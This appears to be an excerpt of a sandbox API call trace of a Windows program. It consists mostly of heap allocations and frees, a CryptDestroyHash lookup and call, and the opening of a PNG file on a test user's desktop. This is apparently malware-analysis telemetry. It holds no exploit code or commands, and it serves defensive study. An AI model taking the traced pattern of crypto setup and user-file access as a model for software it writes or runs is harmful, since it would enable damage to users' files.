[0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4a0 [0167.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.007] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0167.007] CryptDestroyHash (hHash=0x90ae18) returned 1 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0167.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0167.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0167.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0167.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0167.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s1epd3.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.033] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.033] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0167.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0167.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.034] 